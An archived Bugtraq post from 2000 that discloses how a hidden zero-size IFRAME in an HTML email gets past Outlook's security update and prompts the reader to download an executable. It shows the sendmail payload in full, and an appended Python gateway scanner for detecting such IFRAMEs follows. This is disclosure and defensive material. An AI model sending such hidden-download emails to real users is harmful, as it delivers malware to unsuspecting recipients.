[15339] in bugtraq


Circumventing Outlook Security Update File Download Security With

daemon@ATHENA.MIT.EDU (cassius@HUSHMAIL.COM)
Wed Jun 14 17:56:14 2000

Message-Id:  <200006092151.OAA21033@mail5.hushmail.com>
Date:         Fri, 9 Jun 2000 14:33:33 -0800
Reply-To: cassius@HUSHMAIL.COM
From: cassius@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM

This is an update to my previous post on malicious URLs and Outlook.
You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs.

Example:

% sendmail outlookuser@example.com
MIME-Version: 1.0
Content-Type: text/html
Subject: Fake Attachment

<html>
<iframe src='http://download.example.com/badfile.exe' height=0 width=0>
</html>"

>.

This will display an IE 'open/download' dialog if the message is viewed
in the preview pane or opened for reading.

So Outlook with the patch is still vulnerable to worms, viruses and trojans.


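An added example, not part of the original post: a mail-gateway style check in Python that parses a message and reports IFRAMEs in text/html parts whose src is a remote URL, as in the message above. The names FrameFinder and scan_message, the extension list and the sample bytes (built from the post's own example) are assumptions made for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative list of extensions treated as executable (an assumption).
RISKY_EXT = (".exe", ".scr", ".com", ".bat", ".pif", ".vbs")
# Constructed sample: the message from the post, as raw bytes.
SAMPLE = (b"MIME-Version: 1.0\nContent-Type: text/html\nSubject: Fake Attachment\n\n"
          b"<html>\n<iframe src='http://download.example.com/badfile.exe' height=0 width=0>\n"
          b"</html>\n")


class FrameFinder(HTMLParser):
    """Collects IFRAME/FRAME start tags whose src points at a remote host."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "frame"):
            return
        a = {k: (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        url = urlparse(src)
        # Absolute URL, or protocol-relative "//host/path".
        remote = url.scheme in ("http", "https", "ftp") or (not url.scheme and url.netloc)
        if not remote:
            return
        self.findings.append({
            "src": src,
            "hidden": "0" in (a.get("height"), a.get("width")),
            "risky_ext": url.path.lower().endswith(RISKY_EXT),
        })


def scan_message(raw):
    """Return one finding per remote frame in any text/html part of raw (bytes)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            finder = FrameFinder()
            finder.feed(part.get_content())
            finder.close()
            findings.extend(finder.findings)
    return findings
```

A gateway could quarantine the message or strip the tag when scan_message returns any finding; the hidden and risky_ext fields only help rank the result.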
